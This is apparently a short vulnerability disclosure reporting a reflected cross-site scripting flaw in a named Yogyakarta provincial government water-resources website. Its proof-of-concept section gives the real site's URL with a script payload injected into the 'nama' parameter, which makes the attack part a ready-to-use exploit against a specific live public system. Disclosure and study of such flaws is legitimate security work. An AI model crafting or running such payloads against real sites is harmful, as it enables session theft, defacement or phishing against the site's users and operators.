[+] Title: SIM-DPUPESDM Cross Site Scripting (XSS)
[+] Author: abaykandotcom
Description
------------------------------------------
Integrated Water Resources Management (IWRM) is a process of coordination in the development and management of water resources and land and other resources within a river basin, to obtain balanced economic benefits and social welfare without leaving the ecosystem sustainability.
Proof of Concept
------------------------------------------
The vulnerability can be exploited by using the following url:
http://www.sim-dpupesdm.jogjaprov.go.id/page/datainformasi.php?id=49&nama=[XSS]
http://www.sim-dpupesdm.jogjaprov.go.id/page/datainformasi.php?id=49&nama=<script>onmouseover=alert('XSS by abaykandotcom')</script>
Best regards,
Abay.